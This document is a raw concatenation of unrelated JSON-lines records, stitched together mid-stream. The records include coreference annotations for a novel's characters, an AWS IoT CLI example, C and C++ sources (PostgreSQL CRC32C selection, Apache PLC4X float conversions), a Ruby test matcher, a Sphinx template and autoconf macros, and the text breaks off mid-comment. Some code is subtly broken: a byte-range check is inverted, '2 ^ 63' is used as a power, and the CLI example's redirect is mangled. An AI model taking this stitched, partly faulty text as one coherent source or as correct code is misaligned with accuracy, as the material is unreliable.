T139\tSummer_Street-43\nCOREF\tT63\tLucy-7\nCOREF\tT140\tthe_parish_of_Summer_Street-44\nCOREF\tT67\tSummer_Street-43\nCOREF\tT66\tCharlotte_Bartlett-2\nCOREF\tT289\tLucy-7\nCOREF\tT290\tCharlotte_Bartlett-2\nCOREF\tT291\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT292\tLucy-7\nCOREF\tT64\tLucy__s_mother-19\nCOREF\tT293\tLucy__s_mother-19\nCOREF\tT294\tLucy-7\nCOREF\tT295\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT68\tTunbridge_Wells-38\nCOREF\tT296\tLucy-7\nCOREF\tT297\tLucy-7\nCOREF\tT69\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT70\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT298\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT71\tthe_Rectory-45\nCOREF\tT72\tSummer_Street-43\nCOREF\tT299\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT73\tSummer_Street-43\nCOREF\tT300\tLucy-7\nCOREF\tT74\tWindy_Corner-46\nCOREF\tT301\tHoneybush_Family-47\nCOREF\tT65\tWindy_Corner-46\nCOREF\tT76\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT75\tLucy__s_mother-19\nCOREF\tT302\tLucy-7\nCOREF\tT78\tLucy_s_Brother-48\nCOREF\tT303\tLucy-7\nCOREF\tT304\tLucy_and_mother-49\nCOREF\tT305\tLucy_s_Brother-48\nCOREF\tT77\tThe_church-50\nCOREF\tT306\tLucy-7\nCOREF\tT141\tLucy-7\nCOREF\tT79\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT307\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT308\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT309\tCharlotte_Bartlett-2\nCOREF\tT310\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT142\tLucy-7\nCOREF\tT311\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT80\tCharlotte_Bartlett-2\nCOREF\tT312\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT313\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT81\tLucy-7\nCOREF\tT314\tLucy-7\nCOREF\tT82\tFlorence-51\nCOREF\tT315\tLucy-7\nCOREF\tT143\tFlorence-51\nCOREF\tT83\ta_newcomer-52\nCOREF\tT316\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT317\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT144\tFiesole-53\nCOREF\tT145\tSettignano-54\nCOREF\tT85\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT318\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT87\tCharlotte_and_Lucy-3\nCOREF\tT319\ta_clergyman___stout_but_attractive___who_hurried_forward_to_take_his_place_at_the_table___cheerfully_apologizing_for_his_lateness-37\nCOREF\tT86\tPrato-55\nCOREF\tT88\tThat_lady-56\nCOREF\tT89\tCharlotte_Bartlett-2\nCOREF\tT90\tLucy-7\nCOREF\tT320\tCharlotte_Bartlett-2\nCOREF\tT321\tCharlotte_and_Lucy-3\nCOREF\tT322\tCharlotte_and_Lucy-3\nCOREF\tT146\tPeople-57\nCOREF\tT323\tCharlotte_and_Lucy-3\nCOREF\tT147\tthe_electric_trams-58\nCOREF\tT91\tthe_beggars-59\nCOREF\tT92\tthe_place-60\nCOREF\tT324\tCharlotte_and_Lucy-3\nCOREF\tT93\tPension_Bertolini-35\nCOREF\tT325\tCharlotte_and_Lucy-3\nCOREF\tT326\tCharlotte_and_Lucy-3\nCOREF\tT94\tkind_ladies-61\nCOREF\tT327\tCharlotte_and_Lucy-3\nCOREF\tT95\tThat_lady-56\nCOREF\tT148\tPrato-55\nCOREF\tT328\tCharlotte_and_Lucy-3\nCOREF\tT149\tPrato-55\nCOREF\tT96\tPrato-55\nCOREF\tT329\tThat_lady-56\nCOREF\tT330\tThat_lady-56\nCOREF\tT331\tCharlotte_and_Lucy-3\nCOREF\tT97\tGeorge-26\nCOREF\tT98\tGeorge-26\nCOREF\tT99\tThat_lady-56\nCOREF\tT332\tGeorge-26\nCOREF\tT333\tGeorge-26\nCOREF\tT100\tone_of_them-22\nCOREF\tT334\tGeorge-26\nCOREF\tT101\tLucy-7\nCOREF\tT335\tLucy-7\nCOREF\tT336\tfather_and_george-28\nCOREF\tT337\tLucy-7\nCOREF\tT176\tany_one-62\nCOREF\tT338\tLucy-7\nCOREF\tT339\tLucy-7\nCOREF\tT102\tfather_and_george-28\nCOP\tT24\tT219\nMENTION\tT696\t20\t13\t20\t13\tit\tFAC\tPRON\nCOREF\tT696\tThe_first_vacant_room_in_the_front-17\nMENTION\tT698\t22\t3\t22\t3\tit\tFAC\tPRON\nCOREF\tT698\tThe_first_vacant_room_in_the_front-17\nMENTION\tT732\t116\t2\t116\t2\tit\tGPE\tPRON\nCOREF\tT732\tPrato-55\n"} {"text": "\n\n \n \n fplutil perf\n \n \n \n \n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
Summary here
\n \n \n \n\n"} {"text": "{\n \"word\": \"Amount\",\n \"definitions\": [\n \"A quantity of something, especially the total of a thing or things in number, size, value, or extent.\",\n \"A sum of money.\"\n ],\n \"parts-of-speech\": \"Noun\"\n}"} {"text": "**To delete a device's shadow document**\n\nThe following ``delete-thing-shadow`` example deletes the entire shadow document for the device named ``MyRPi``. ::\n\n aws iot-data delete-thing-shadow \\\n --thing-name MyRPi \\\n \"output.txt\"\n\nThe command produces no output on the display, but ``output.txt`` contains information that confirms the version and timestamp of the shadow document that you deleted. ::\n\n {\"version\":2,\"timestamp\":1560270384}\n\nFor more information, see `Using Shadows `__ in the *AWS IoT Developers Guide*.\n\n"} {"text": "/*************************************************************\n * Copyright (c) 2006 Shotaro Tsuji\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\t * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n * IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR\n * THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n *\n *************************************************************/\n\n/* Please send bug reports to\n\tShotaro Tsuji\n\t4-1010,\n\tSakasedai 1-chome,\n\tTakaraduka-si,\n\tHyogo-ken,\n\t665-0024\n\tJapan\n\tnegi4d41@yahoo.co.jp\n*/\n\n#include \n#include \"time_util.h\"\n\ndouble difftime(time_t time1, time_t time0)\n{\n\treturn (double)(time1-time0);\n}\n"} {"text": "// Copyright 2015 The Go Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n// +build ignore\n\n#ifdef WIN32\n#if defined(EXPORT_DLL)\n# define VAR __declspec(dllexport)\n#elif defined(IMPORT_DLL)\n# define VAR __declspec(dllimport)\n#endif\n#else\n# define VAR extern\n#endif\n\nVAR const char *exported_var;\n"} {"text": "/*-------------------------------------------------------------------------\n *\n * pg_crc32c_armv8_choose.c\n *\t Choose between ARMv8 and software CRC-32C implementation.\n *\n * On first call, checks if the CPU we're running on supports the ARMv8\n * CRC Extension. If it does, use the special instructions for CRC-32C\n * computation. Otherwise, fall back to the pure software implementation\n * (slicing-by-8).\n *\n * Portions Copyright (c) 1996-2019, PostgreSQL Global Development Group\n * Portions Copyright (c) 1994, Regents of the University of California\n *\n *\n * IDENTIFICATION\n *\t src/port/pg_crc32c_armv8_choose.c\n *\n *-------------------------------------------------------------------------\n */\n\n#ifndef FRONTEND\n#include \"postgres.h\"\n#else\n#include \"postgres_fe.h\"\n#endif\n\n#include \n#include \n\n#include \"port/pg_crc32c.h\"\n\n\nstatic sigjmp_buf illegal_instruction_jump;\n\n/*\n * Probe by trying to execute pg_comp_crc32c_armv8(). If the instruction\n * isn't available, we expect to get SIGILL, which we can trap.\n */\nstatic void\nillegal_instruction_handler(SIGNAL_ARGS)\n{\n\tsiglongjmp(illegal_instruction_jump, 1);\n}\n\nstatic bool\npg_crc32c_armv8_available(void)\n{\n\tuint64\t\tdata = 42;\n\tint\t\t\tresult;\n\n\t/*\n\t * Be careful not to do anything that might throw an error while we have\n\t * the SIGILL handler set to a nonstandard value.\n\t */\n\tpqsignal(SIGILL, illegal_instruction_handler);\n\tif (sigsetjmp(illegal_instruction_jump, 1) == 0)\n\t{\n\t\t/* Rather than hard-wiring an expected result, compare to SB8 code */\n\t\tresult = (pg_comp_crc32c_armv8(0, &data, sizeof(data)) ==\n\t\t\t\t pg_comp_crc32c_sb8(0, &data, sizeof(data)));\n\t}\n\telse\n\t{\n\t\t/* We got the SIGILL trap */\n\t\tresult = -1;\n\t}\n\tpqsignal(SIGILL, SIG_DFL);\n\n#ifndef FRONTEND\n\t/* We don't expect this case, so complain loudly */\n\tif (result == 0)\n\t\telog(ERROR, \"crc32 hardware and software results disagree\");\n\n\telog(DEBUG1, \"using armv8 crc32 hardware = %d\", (result > 0));\n#endif\n\n\treturn (result > 0);\n}\n\n/*\n * This gets called on the first call. It replaces the function pointer\n * so that subsequent calls are routed directly to the chosen implementation.\n */\nstatic pg_crc32c\npg_comp_crc32c_choose(pg_crc32c crc, const void *data, size_t len)\n{\n\tif (pg_crc32c_armv8_available())\n\t\tpg_comp_crc32c = pg_comp_crc32c_armv8;\n\telse\n\t\tpg_comp_crc32c = pg_comp_crc32c_sb8;\n\n\treturn pg_comp_crc32c(crc, data, len);\n}\n\npg_crc32c\t(*pg_comp_crc32c) (pg_crc32c crc, const void *data, size_t len) = pg_comp_crc32c_choose;\n"} {"text": "{\n \"name\": \"Evoke-3\",\n \"description\": \"A digital radio.\",\n \"url\": \"https://www.amazon.co.uk/EVOKE-3-Portable-Stereo-Radio-Recording/dp/B001HBIXSM\"\n}"} {"text": "data = \n'\n\t\n\t\tItem Category\n\t\n';\n\t}\n\t\n\tfunction expected()\n\t{\n\t\t$this->expected = 'Item Category';\n\t}\n}\n\n?>"} {"text": "module Spec\n module Matchers\n class AutotestMappingMatcher\n def initialize(specs)\n @specs = specs\n end\n \n def to(file)\n @file = file\n self\n end\n \n def matches?(autotest)\n @autotest = prepare autotest\n @actual = autotest.test_files_for(@file)\n @actual == @specs\n end\n \n def failure_message\n \"expected #{@autotest.class} to map #{@specs.inspect} to #{@file.inspect}\\ngot #{@actual.inspect}\"\n end\n \n private\n def prepare autotest\n stub_found_files autotest\n stub_find_order autotest\n autotest\n end\n \n def stub_found_files autotest\n found_files = @specs.inject({}){|h,f| h[f] = Time.at(0)}\n autotest.stub!(:find_files).and_return(found_files)\n end\n\n def stub_find_order autotest\n find_order = @specs.dup << @file\n autotest.instance_eval { @find_order = find_order }\n end\n\n end\n \n def map_specs(specs)\n AutotestMappingMatcher.new(specs)\n end\n \n end\nend"} {"text": "{#\n sphinxdoc/layout.html\n ~~~~~~~~~~~~~~~~~~~~~\n\n Sphinx layout template for the sphinxdoc theme.\n\n :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n#}\n{%- extends \"basic/layout.html\" %}\n\n{# put the sidebar before the body #}\n{% block sidebar1 %}{{ sidebar() }}{% endblock %}\n{% block sidebar2 %}{% endblock %}\n"} {"text": "/*\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n*/\n\n#include \"DefaultFloatFieldItem.h\"\n\nnamespace org\n{\n\tnamespace apache\n\t{\n\t\tnamespace plc4x\n\t\t{\n\t\t\tnamespace cpp\n\t\t\t{\n\t\t\t\tnamespace base\n\t\t\t\t{\n\t\t\t\t\tnamespace messages\n\t\t\t\t\t{\n\t\t\t\t\t\tnamespace items\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t// ==================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::getBoolean(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidBoolean(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"bool\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidByte(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value <= -127 && value >= -128;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tchar DefaultFloatFieldItem::getByte(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidByte(index)) \n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"char\", index);\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\treturn (char) getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidShort(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -32768 && value <= 32767;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tshort DefaultFloatFieldItem::getShort(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidShort(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"short\", index);\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\treturn (short)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= 0 && value <= 2147483647;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tint DefaultFloatFieldItem::getInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidInteger(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"int\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (int)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidLong(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -(2 ^ 63) && value <= (2 ^ 63) - 1;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tlong DefaultFloatFieldItem::getLong(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidLong(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"long\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (long)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidBigInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\treturn true;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tlong long DefaultFloatFieldItem::getBigInteger(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidBigInteger(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"long long\", index);\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t// Todo: add conversion from cpp_dec_float_100 TO long long\n\t\t\t\t\t\t\t\treturn (long)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidFloat(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tfloat value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -3.4e38 && value <= 3.4e38;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tfloat DefaultFloatFieldItem::getFloat(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidFloat(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"float\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (float)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidDouble(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tdouble value = getValue(index);\n\t\t\t\t\t\t\t\treturn value >= -1.7e308 && value <= 1.7e308;\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tdouble DefaultFloatFieldItem::getDouble(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidDouble(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"double\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (double)getValue(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tbool DefaultFloatFieldItem::isValidBigDecimal(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t// same limits but higher precision\n\t\t\t\t\t\t\t\treturn isValidDouble(index);\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t// ===================================================\n\t\t\t\t\t\t\tcpp_dec_float_100 DefaultFloatFieldItem::getBigDecimal(int index)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\tif (!isValidBigDecimal(index))\n\t\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t\tthrow new PlcIncompatibleDatatypeException(\"cpp_dec_float_100\", index);\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\treturn (cpp_dec_float_100)getValue(index);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}\n"} {"text": "# generated automatically by aclocal 1.11.6 -*- Autoconf -*-\n\n# Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004,\n# 2005, 2006, 2007, 2008, 2009, 2010, 2011 Free Software Foundation,\n# Inc.\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY, to the extent permitted by law; without\n# even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE.\n\nm4_ifndef([AC_AUTOCONF_VERSION],\n [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl\nm4_if(m4_defn([AC_AUTOCONF_VERSION]), [2.68],,\n[m4_warning([this file was generated for autoconf 2.68.\nYou have another version of autoconf. It may work, but is not guaranteed to.\nIf you have problems, you may need to regenerate the build system entirely.\nTo do so, use the procedure documented by the package, typically `autoreconf'.])])\n\n# Copyright (C) 2002, 2003, 2005, 2006, 2007, 2008, 2011 Free Software\n# Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# AM_AUTOMAKE_VERSION(VERSION)\n# ----------------------------\n# Automake X.Y traces this macro to ensure aclocal.m4 has been\n# generated from the m4 files accompanying Automake X.Y.\n# (This private macro should not be called outside this file.)\nAC_DEFUN([AM_AUTOMAKE_VERSION],\n[am__api_version='1.11'\ndnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to\ndnl require some minimum version. Point them to the right macro.\nm4_if([$1], [1.11.6], [],\n [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl\n])\n\n# _AM_AUTOCONF_VERSION(VERSION)\n# -----------------------------\n# aclocal traces this macro to find the Autoconf version.\n# This is a private macro too. Using m4_define simplifies\n# the logic in aclocal, which can simply ignore this definition.\nm4_define([_AM_AUTOCONF_VERSION], [])\n\n# AM_SET_CURRENT_AUTOMAKE_VERSION\n# -------------------------------\n# Call AM_AUTOMAKE_VERSION and AM_AUTOMAKE_VERSION so they can be traced.\n# This function is AC_REQUIREd by AM_INIT_AUTOMAKE.\nAC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION],\n[AM_AUTOMAKE_VERSION([1.11.6])dnl\nm4_ifndef([AC_AUTOCONF_VERSION],\n [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl\n_AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))])\n\n# AM_AUX_DIR_EXPAND -*- Autoconf -*-\n\n# Copyright (C) 2001, 2003, 2005, 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 1\n\n# For projects using AC_CONFIG_AUX_DIR([foo]), Autoconf sets\n# $ac_aux_dir to `$srcdir/foo'. In other projects, it is set to\n# `$srcdir', `$srcdir/..', or `$srcdir/../..'.\n#\n# Of course, Automake must honor this variable whenever it calls a\n# tool from the auxiliary directory. The problem is that $srcdir (and\n# therefore $ac_aux_dir as well) can be either absolute or relative,\n# depending on how configure is run. This is pretty annoying, since\n# it makes $ac_aux_dir quite unusable in subdirectories: in the top\n# source directory, any form will work fine, but in subdirectories a\n# relative path needs to be adjusted first.\n#\n# $ac_aux_dir/missing\n# fails when called from a subdirectory if $ac_aux_dir is relative\n# $top_srcdir/$ac_aux_dir/missing\n# fails if $ac_aux_dir is absolute,\n# fails when called from a subdirectory in a VPATH build with\n# a relative $ac_aux_dir\n#\n# The reason of the latter failure is that $top_srcdir and $ac_aux_dir\n# are both prefixed by $srcdir. In an in-source build this is usually\n# harmless because $srcdir is `.', but things will broke when you\n# start a VPATH build or use an absolute $srcdir.\n#\n# So we could use something similar to $top_srcdir/$ac_aux_dir/missing,\n# iff we strip the leading $srcdir from $ac_aux_dir. That would be:\n# am_aux_dir='\\$(top_srcdir)/'`expr \"$ac_aux_dir\" : \"$srcdir//*\\(.*\\)\"`\n# and then we would define $MISSING as\n# MISSING=\"\\${SHELL} $am_aux_dir/missing\"\n# This will work as long as MISSING is not called from configure, because\n# unfortunately $(top_srcdir) has no meaning in configure.\n# However there are other variables, like CC, which are often used in\n# configure, and could therefore not use this \"fixed\" $ac_aux_dir.\n#\n# Another solution, used here, is to always expand $ac_aux_dir to an\n# absolute PATH. The drawback is that using absolute paths prevent a\n# configured tree to be moved without reconfiguration.\n\nAC_DEFUN([AM_AUX_DIR_EXPAND],\n[dnl Rely on autoconf to set up CDPATH properly.\nAC_PREREQ([2.50])dnl\n# expand $ac_aux_dir to an absolute path\nam_aux_dir=`cd $ac_aux_dir && pwd`\n])\n\n# AM_CONDITIONAL -*- Autoconf -*-\n\n# Copyright (C) 1997, 2000, 2001, 2003, 2004, 2005, 2006, 2008\n# Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 9\n\n# AM_CONDITIONAL(NAME, SHELL-CONDITION)\n# -------------------------------------\n# Define a conditional.\nAC_DEFUN([AM_CONDITIONAL],\n[AC_PREREQ(2.52)dnl\n ifelse([$1], [TRUE], [AC_FATAL([$0: invalid condition: $1])],\n\t[$1], [FALSE], [AC_FATAL([$0: invalid condition: $1])])dnl\nAC_SUBST([$1_TRUE])dnl\nAC_SUBST([$1_FALSE])dnl\n_AM_SUBST_NOTMAKE([$1_TRUE])dnl\n_AM_SUBST_NOTMAKE([$1_FALSE])dnl\nm4_define([_AM_COND_VALUE_$1], [$2])dnl\nif $2; then\n $1_TRUE=\n $1_FALSE='#'\nelse\n $1_TRUE='#'\n $1_FALSE=\nfi\nAC_CONFIG_COMMANDS_PRE(\n[if test -z \"${$1_TRUE}\" && test -z \"${$1_FALSE}\"; then\n AC_MSG_ERROR([[conditional \"$1\" was never defined.\nUsually this means the macro was only invoked conditionally.]])\nfi])])\n\n# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2009,\n# 2010, 2011 Free Software Foundation, Inc.\n#\n# This file is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# serial 12\n\n# There are a few dirty hacks below to avoid letting `AC_PROG_CC' be\n# written in clear, in which case automake, when reading aclocal.m4,\n# will think it sees a *use*, and therefore will trigger all it's\n# C support machinery. Also note that it means that autoscan, seeing\n# CC etc. in the Makefile, will ask for an AC_PROG_CC use...\n\n\n# _AM_DEPENDENCIES(NAME)\n# ----------------------\n# See how the compiler implements dependency checking.\n# NAME is \"CC\", \"CXX\", \"GCJ\", or \"OBJC\".\n# We try a few techniques and use that to set a single cache variable.\n#\n# We don't AC_REQUIRE the corresponding AC_PROG_CC since the latter was\n# modified to invoke _AM_DEPENDENCIES(CC); we would have a circular\n# dependency, and given that the user is not expected to run this macro,\n# just rely on AC_PROG_CC.\nAC_DEFUN([_AM_DEPENDENCIES],\n[AC_REQUIRE([AM_SET_DEPDIR])dnl\nAC_REQUIRE([AM_OUTPUT_DEPENDENCY_COMMANDS])dnl\nAC_REQUIRE([AM_MAKE_INCLUDE])dnl\nAC_REQUIRE([AM_DEP_TRACK])dnl\n\nifelse([$1], CC, [depcc=\"$CC\" am_compiler_list=],\n [$1], CXX, [depcc=\"$CXX\" am_compiler_list=],\n [$1], OBJC, [depcc=\"$OBJC\" am_compiler_list='gcc3 gcc'],\n [$1], UPC, [depcc=\"$UPC\" am_compiler_list=],\n [$1], GCJ, [depcc=\"$GCJ\" am_compiler_list='gcc3 gcc'],\n [depcc=\"$$1\" am_compiler_list=])\n\nAC_CACHE_CHECK([dependency style of $depcc],\n [am_cv_$1_dependencies_compiler_type],\n[if test -z \"$AMDEP_TRUE\" && test -f \"$am_depcomp\"; then\n # We make a subdir and do the tests there. Otherwise we can end up\n # making bogus files that we don't know about and never remove. For\n # instance it was reported that on HP-UX the gcc test will end up\n # making a dummy file named `D' -- because `-MD' means `put the output\n # in 